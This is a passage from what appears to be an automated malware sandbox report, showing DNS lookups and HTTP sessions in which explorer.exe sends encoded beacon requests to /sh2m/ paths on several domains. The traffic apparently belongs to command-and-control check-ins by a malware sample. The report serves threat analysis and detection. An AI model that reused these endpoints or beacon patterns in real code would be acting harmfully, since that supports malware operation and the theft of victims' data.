                                                                                                      Jun 11, 2021 09:03:42.844861031 CEST53587848.8.8.8192.168.2.3

                                                                                                      ICMP Packets

                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                      Jun 11, 2021 09:03:33.391097069 CEST192.168.2.38.8.8.8cff1(Port unreachable)Destination Unreachable
                                                                                                      Jun 11, 2021 09:03:34.391709089 CEST192.168.2.38.8.8.8cff1(Port unreachable)Destination Unreachable

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                      Jun 11, 2021 09:02:35.988408089 CEST192.168.2.38.8.8.80x79f9Standard query (0)www.take-me-bergen.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:46.233736038 CEST192.168.2.38.8.8.80x62a3Standard query (0)www.starflexacademy.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:51.466469049 CEST192.168.2.38.8.8.80x1ff4Standard query (0)www.ladorreguita.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:56.938940048 CEST192.168.2.38.8.8.80x42e2Standard query (0)www.candydulce.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:07.589299917 CEST192.168.2.38.8.8.80xa4ccStandard query (0)www.insurancedowntown.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:13.048239946 CEST192.168.2.38.8.8.80xc68eStandard query (0)www.ezonkorea.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:19.203794003 CEST192.168.2.38.8.8.80x87aaStandard query (0)www.dndemystified.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:24.607898951 CEST192.168.2.38.8.8.80x49daStandard query (0)www.meganfantastic.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:30.319385052 CEST192.168.2.38.8.8.80x5849Standard query (0)www.obi4ex.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:31.326244116 CEST192.168.2.38.8.8.80x5849Standard query (0)www.obi4ex.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:32.326234102 CEST192.168.2.38.8.8.80x5849Standard query (0)www.obi4ex.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:37.406413078 CEST192.168.2.38.8.8.80xbd04Standard query (0)www.sciencebasedmasks.comA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:42.657643080 CEST192.168.2.38.8.8.80x9fb3Standard query (0)www.baliholisticacademy.comA (IP address)IN (0x0001)

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                      Jun 11, 2021 09:02:36.054531097 CEST8.8.8.8192.168.2.30x79f9No error (0)www.take-me-bergen.com172.67.206.33A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:36.054531097 CEST8.8.8.8192.168.2.30x79f9No error (0)www.take-me-bergen.com104.21.37.82A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:46.329618931 CEST8.8.8.8192.168.2.30x62a3No error (0)www.starflexacademy.comwww-starflexacademy-com.rentcafecn.comCNAME (Canonical name)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:46.329618931 CEST8.8.8.8192.168.2.30x62a3No error (0)www-starflexacademy-com.rentcafecn.comwww.rentcafecloudflaremvccn.comCNAME (Canonical name)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:46.329618931 CEST8.8.8.8192.168.2.30x62a3No error (0)www.rentcafecloudflaremvccn.com104.18.193.20A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:46.329618931 CEST8.8.8.8192.168.2.30x62a3No error (0)www.rentcafecloudflaremvccn.com104.18.194.20A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:51.529956102 CEST8.8.8.8192.168.2.30x1ff4No error (0)www.ladorreguita.com173.234.255.253A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:57.016514063 CEST8.8.8.8192.168.2.30x42e2No error (0)www.candydulce.com104.21.89.72A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:02:57.016514063 CEST8.8.8.8192.168.2.30x42e2No error (0)www.candydulce.com172.67.156.242A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:07.749241114 CEST8.8.8.8192.168.2.30xa4ccNo error (0)www.insurancedowntown.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:07.749241114 CEST8.8.8.8192.168.2.30xa4ccNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.143.65.214A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:07.749241114 CEST8.8.8.8192.168.2.30xa4ccNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com13.59.53.244A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:07.749241114 CEST8.8.8.8192.168.2.30xa4ccNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com52.14.32.15A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:13.402180910 CEST8.8.8.8192.168.2.30xc68eNo error (0)www.ezonkorea.com3.34.12.41A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:19.267663002 CEST8.8.8.8192.168.2.30x87aaNo error (0)www.dndemystified.comdndemystified.comCNAME (Canonical name)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:19.267663002 CEST8.8.8.8192.168.2.30x87aaNo error (0)dndemystified.com107.180.57.111A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:24.679627895 CEST8.8.8.8192.168.2.30x49daNo error (0)www.meganfantastic.com45.195.169.197A (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:32.392487049 CEST8.8.8.8192.168.2.30x5849Server failure (2)www.obi4ex.comnonenoneA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:33.390429974 CEST8.8.8.8192.168.2.30x5849Server failure (2)www.obi4ex.comnonenoneA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:34.391613007 CEST8.8.8.8192.168.2.30x5849Server failure (2)www.obi4ex.comnonenoneA (IP address)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:37.484054089 CEST8.8.8.8192.168.2.30xbd04No error (0)www.sciencebasedmasks.comwww.sciencebasedmasks.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                      Jun 11, 2021 09:03:42.844861031 CEST8.8.8.8192.168.2.30x9fb3No error (0)www.baliholisticacademy.com192.185.0.218A (IP address)IN (0x0001)

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • www.take-me-bergen.com
                                                                                                      • www.starflexacademy.com
                                                                                                      • www.ladorreguita.com
                                                                                                      • www.candydulce.com
                                                                                                      • www.insurancedowntown.com
                                                                                                      • www.ezonkorea.com
                                                                                                      • www.dndemystified.com
                                                                                                      • www.meganfantastic.com

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.349730172.67.206.3380C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jun 11, 2021 09:02:36.107449055 CEST564OUTGET /sh2m/?i0=Y4nA7D8ZanudJV/n7ckHSBWOhW22WEJR/asQiGNTmjaNDyrYZ8Q/zKqiBMBjk5weHegN&4huxZr=02MtK8MPsR3L HTTP/1.1
                                                                                                      Host: www.take-me-bergen.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      Jun 11, 2021 09:02:36.198753119 CEST565INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Fri, 11 Jun 2021 07:02:36 GMT
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=3600
                                                                                                      Expires: Fri, 11 Jun 2021 08:02:36 GMT
                                                                                                      Location: https://www.take-me-bergen.com/sh2m/?i0=Y4nA7D8ZanudJV/n7ckHSBWOhW22WEJR/asQiGNTmjaNDyrYZ8Q/zKqiBMBjk5weHegN&4huxZr=02MtK8MPsR3L
                                                                                                      cf-request-id: 0a9b7a4b6f00004e86649e6000000001
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=uZ7PdS8U42szUs6C995EPraRtYy8Z3heGDXHo52srsFgAOnHMVc1HK%2B33rG%2BJTIScJ5dUmsF%2FDV7BlHuDeG3FVgn0V3QRqxPm9ZPQBu8%2FJfPGZBjbl7E0sLXjgXuvNuIQbPRYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 65d8f98bef064e86-FRA
                                                                                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      1192.168.2.349736104.18.193.2080C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jun 11, 2021 09:02:46.375958920 CEST4569OUTGET /sh2m/?i0=CQ6AMTNmXrT6GsHyvLqygrxreupfdtmN+4T1XtvAXMgditzRj6Y1Xuw537ryrSqhWitY&4huxZr=02MtK8MPsR3L HTTP/1.1
                                                                                                      Host: www.starflexacademy.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      Jun 11, 2021 09:02:46.430977106 CEST4570INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Fri, 11 Jun 2021 07:02:46 GMT
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=3600
                                                                                                      Expires: Fri, 11 Jun 2021 08:02:46 GMT
                                                                                                      Location: https://www.starflexacademy.com/sh2m/?i0=CQ6AMTNmXrT6GsHyvLqygrxreupfdtmN+4T1XtvAXMgditzRj6Y1Xuw537ryrSqhWitY&4huxZr=02MtK8MPsR3L
                                                                                                      cf-request-id: 0a9b7a7388000006292d0a2000000001
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 65d8f9cc0aa40629-FRA
                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      2192.168.2.349737173.234.255.25380C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jun 11, 2021 09:02:51.728471041 CEST4571OUTGET /sh2m/?i0=AN9Dli3eSwBxhLN7Z92H8FzDOGpUzm7G3BkkvfgYwC6zoN6kwH9F+lw53Jt7Bui6OWXD&4huxZr=02MtK8MPsR3L HTTP/1.1
                                                                                                      Host: www.ladorreguita.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      Jun 11, 2021 09:02:51.927200079 CEST4571INHTTP/1.1 200 OK
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                      X-Powered-By: Nginx
                                                                                                      Date: Fri, 11 Jun 2021 07:02:57 GMT
                                                                                                      Connection: close
                                                                                                      Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                                      Data Ascii: 3
                                                                                                      Jun 11, 2021 09:02:51.927234888 CEST4573INData Raw: 31 30 33 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63
                                                                                                      Data Ascii: 1032<!DOCTYPE html><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?1e02c56af5428a6fcaf737c41a8ae775"; var s = document.getElementsByTagName("script")[0];
                                                                                                      Jun 11, 2021 09:02:51.927257061 CEST4574INData Raw: 32 34 32 34 32 34 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 38 70 78 7d 2e 61 6c 65 72 74 2d 62 74 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                                      Data Ascii: 242424;font-size:28px}.alert-btn{display:block;border-radius:10px;background-color:#090;line-height:55px;color:#fff;font-size:30px;text-decoration:none;letter-spacing:2px}.alert-btn:hover{background-color:#090}.alert-footer{margin:0 auto;heigh
                                                                                                      Jun 11, 2021 09:02:51.927275896 CEST4575INData Raw: 20 35 25 3b 63 6f 6c 6f 72 3a 23 37 62 37 62 37 62 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 61 6c 65 72 74 2d 63 6f 6e 63 65 6e 74 20 70 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 37 70 78 7d 2e 61 6c 65 72 74 2d 62 74 6e 7b 68 65 69 67
                                                                                                      Data Ascii: 5%;color:#7b7b7b;font-size:18px}.alert-concent p{line-height:37px}.alert-btn{height:5%;width:70%;margin:0 auto}#js-sec-text{font-size:5em;position:absolute;top:-6%;left:40%}} </style></head><body class="ie8"><div id="js-alert-box" clas
                                                                                                      Jun 11, 2021 09:02:51.927292109 CEST4575INData Raw: 68 4c 52 63 4f 68 77 36 76 44 72 48 76 43 76 43 76 44 6a 78 6e 43 69 4d 4b 6e 57 41 6e 43 67 38 4b 72 77 35 6c 44 59 7a 6b 44 27 2c 27 77 36 6b 35 5a 79 7a 44 6b 77 3d 3d 27 2c 27 5a 55 4c 44 68 42 56 49 27 2c 27 44 32 58 44 6e 51 72 44 75 63 4b
                                                                                                      Data Ascii: hLRcOhw6vDrHvCvCvDjxnCiMKnWAnCg8Krw5lDYzkD','w6k5ZyzDkw==','ZULDhBVI','D2XDnQrDucKTVA==','Z8Krw4Bpw74=','wqwIw4dzwp/DmkIpw7TCkcOARcKgw7g='


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      3192.168.2.349738104.21.89.7280C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jun 11, 2021 09:02:57.061425924 CEST4576OUTGET /sh2m/?i0=Qqwfsv61LD8gOSv2HQNs13/ILT3hkPAGuV1QQZOHa/kG/rdN/rA5QVkGcwq5olxFBDS9&4huxZr=02MtK8MPsR3L HTTP/1.1
                                                                                                      Host: www.candydulce.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      Jun 11, 2021 09:02:57.445303917 CEST4578INHTTP/1.1 508 Loop Detected
                                                                                                      Date: Fri, 11 Jun 2021 07:02:57 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Retry-After: 14400
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      cf-request-id: 0a9b7a9d4700004a56888ee000000001
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=X84uMHwcaOhnSaqO3QxevRGwyYRAADiM%2Fy3AJfFNjvSLLMCTJF%2BkAoJc66bHNiit0ArF6PoXjGYjdMYPlVrQyVbiaPMUJBrHCgmu2owzAO9P3l1UkID7qT6vkObWdgmH"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 65d8fa0ed8994a56-FRA
                                                                                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                      Data Raw: 33 32 36 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 20 35 30 38 20 52 65 73 6f 75 72 63 65 20 4c 69 6d 69 74 20 49 73 20 52 65 61 63 68 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 27 2f 63 64 6e 2d 63 67 69 2f 62 6d 2f 63 76 2f 36 36 39 38 33 35 31 38 37 2f 61 70 69 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 52 65 73 6f 75 72 63 65 20 4c 69 6d 69 74 20 49 73 20 52 65 61 63 68 65 64 3c 2f 48 31 3e 0a 54 68 65 20 77 65 62 73 69 74 65 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 61 73 20 69 74 20 65 78 63 65 65 64 65 64 20 72 65 73 6f 75 72 63 65 20 6c 69 6d 69 74 2e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 5b 27 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 27 5d 3d 7b 72 3a 27 36 35 64 38 66 61 30 65 64 38 39 39 34 61 35 36 27 2c 6d 3a 27 64 65 33 33 62 36 37 65 34 64 34 33 35 35 37 62 61 64 36 33 39 34 38 35 34 36 32 66 61 39 37 66 32 63 35 39 38 37 38 38 2d 31 36 32 33 33 39 34 39 37 37 2d 31 38 30 30 2d 41 66 54 7a 6a 78 50 37 4a 69 44 34 33 44 5a 71 6f 6f 52 4c 72 6c 55 35 48 77 59
                                                                                                      Data Ascii: 326<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE> 508 Resource Limit Is Reached</TITLE><script async src='/cdn-cgi/bm/cv/669835187/api.js'></script></HEAD><BODY><H1>Resource Limit Is Reached</H1>The website is temporarily unable to service your request as it exceeded resource limit.Please try again later.<script type="text/javascript">(function(){window['__CF$cv$params']={r:'65d8fa0ed8994a56',m:'de33b67e4d43557bad639485462fa97f2c598788-1623394977-1800-AfTzjxP7JiD43DZqooRLrlU5HwY
                                                                                                      Jun 11, 2021 09:02:57.445329905 CEST4578INData Raw: 34 61 36 37 33 35 57 31 30 68 54 52 42 6a 2b 36 77 50 52 4c 36 49 53 52 68 73 63 31 5a 64 75 78 4c 2b 6c 61 56 41 79 68 78 41 65 70 49 7a 43 37 4a 50 79 69 48 33 69 44 6c 39 6f 30 65 61 49 43 35 7a 32 52 6f 65 6a 63 62 6d 65 35 78 57 35 6e 5a 44
                                                                                                      Data Ascii: 4a6735W10hTRBj+6wPRL6ISRhsc1ZduxL+laVAyhxAepIzC7JPyiH3iDl9o0eaIC5z2Roejcbme5xW5nZDxhs2t5HKmx9y4sL723PdFKD5arezxQzkRgTAvEQ/NZ3LD1z+VNTWmiklYXKfTBNMWkuhUmy0KOda8yjIwS5vsM3UW+97iORGNm6vsqDPnJ2qmeYmEnCs66MTwezsGT96gPgXPzPDy9le6fnln9IsQ==',s:[0x72d
                                                                                                      Jun 11, 2021 09:02:57.445338964 CEST4578INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      4192.168.2.3497393.143.65.21480C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jun 11, 2021 09:03:07.889676094 CEST4580OUTGET /sh2m/?i0=c9aUCvLa9Ql2a6xFKe5xJWdXulTfAnmJmW0relGKzVi+CMwVFA49Zy8Fshmf8yObHaZC&4huxZr=02MtK8MPsR3L HTTP/1.1
                                                                                                      Host: www.insurancedowntown.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      Jun 11, 2021 09:03:08.030723095 CEST4580INHTTP/1.1 404 Not Found
                                                                                                      Date: Fri, 11 Jun 2021 07:03:07 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 153
                                                                                                      Connection: close
                                                                                                      Server: nginx/1.16.1
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      5192.168.2.3497423.34.12.4180C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jun 11, 2021 09:03:13.687930107 CEST4657OUTGET /sh2m/?i0=UiVwUNrNLQfwtohPmVYH70t5lUixURpqlrLqHTUDsyREBVD/9Tpqi3FDGPs9lJ3zNa3b&4huxZr=02MtK8MPsR3L HTTP/1.1
                                                                                                      Host: www.ezonkorea.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      Jun 11, 2021 09:03:13.974311113 CEST4659INHTTP/1.1 404 Not Found
                                                                                                      Date: Fri, 11 Jun 2021 07:03:13 GMT
                                                                                                      Server: Apache
                                                                                                      X-Powered-By: PHP/5.6.36
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Cache-Control: No-Cache
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Data Raw: 31 66 62 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 72 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 33 36 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e ed 86 b5 ed 95 a9 eb b3 b4 ed 97 98 20 eb b9 84 ea b5 90 ea b2 ac ec a0 81 ec 82 ac ec 9d b4 ed 8a b8 3c 2f 74 69 74 6c 65 3e 0a 09 09 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 31 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 51 75 65 72 79 2e 73 65 72 69 61 6c 69 7a 65 4f 62 6a 65 63 74 2f 32 2e 30 2e 33 2f 6a 71 75 65 72 79 2e 73 65 72 69 61 6c 69 7a 65 4f 62 6a 65 63 74 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 73 6f 6e 33 2f 33 2e 33 2e 32 2f 6a 73 6f 6e 33 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0a 20 20 20 20 20 20 24 66 6f 72 6d 20 3d 20 24 28 27 2e 70 75 72 65 2d 66 6f 72 6d 27 29 3b 0a 20 20 20 20 20 20 24 66 6f 72 6d 2e 73 75 62 6d 69 74 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 24 74 68 69 73 20 3d 20 24 28 74 68 69 73 29 3b 0a 0a 09 09 76 61 72 20 66 20 3d 20 74 68 69 73 3b 0a 0a 09 09 69 66 20 28 66 2e 61 67 72 65 65 2e 63 68 65 63 6b 65 64 20 3d 3d 20 66 61 6c 73 65 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ea b0 9c ec 9d b8 ec a0 95 eb b3 b4 ec b7 a8 ea b8 89 eb b0 a9 ec b9 a8 ec 97 90 20 eb 8f 99 ec 9d 98 ed 95 b4 20 ec a3 bc ec 84 b8 ec 9a 94 2e 27 29 3b 0a 09 09 09 09 66 2e 61 67 72 65 65 2e 66 6f 63 75 73 28 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 7d 0a 0a 09 09 09 0a 09 09 09 09 69 66 20 28 66 2e 63 75 73 74 6f 6d 65 72 5f 6e 61 6d 65 2e 76 61 6c 75 65 20 3d 3d 20 22 22 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ec 9d b4 eb a6 84 ec 9d 84 20 ec 9e 85 eb a0 a5 ed 95 b4 20 ec a3 bc ec 84 b8 ec 9a 94 2e 27 29 3b 0a 09 09 09 09 66 2e 63 75 73 74 6f 6d 65 72 5f 6e 61 6d 65 2e 66 6f 63 75 73 28 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 7d 0a 0a 20 20 20 20 09 09 09 69 66 20 28 66 2e 63 75 73 74 6f 6d 65 72 5f 62 69 72 74 68 2e 76 61 6c 75 65 20 3d 3d 20 22 22 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ec 83 9d eb 85 84 ec 9b 94 ec 9d bc ec 9d 84 20 ec 9e 85 eb a0 a5 ed 95
                                                                                                      Data Ascii: 1fb4<!doctype html><html lang="kr"><head><meta name="viewport" content="width=360, user-scalable=no"><meta charset="UTF-8"><meta name="format-detection" content="telephone=no" /><title> </title><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jQuery.serializeObject/2.0.3/jquery.serializeObject.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/json3/3.3.2/json3.min.js"></script> <script type="text/javascript"> jQuery(function($) { $form = $('.pure-form'); $form.submit(function(e) { var $this = $(this);var f = this;if (f.agree.checked == false){alert(' .');f.agree.focus();return false;}if (f.customer_name.value == ""){alert(' .');f.customer_name.focus();return false;} if (f.customer_birth.value == ""){alert('
                                                                                                      Jun 11, 2021 09:03:13.974340916 CEST4660INData Raw: b4 20 ec a3 bc ec 84 b8 ec 9a 94 2e 27 29 3b 0a 09 09 09 09 66 2e 63 75 73 74 6f 6d 65 72 5f 62 69 72 74 68 2e 66 6f 63 75 73 28 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 7d 0a 0a 09 09 09 69 66 20 28 66 2e 6d 6f 62
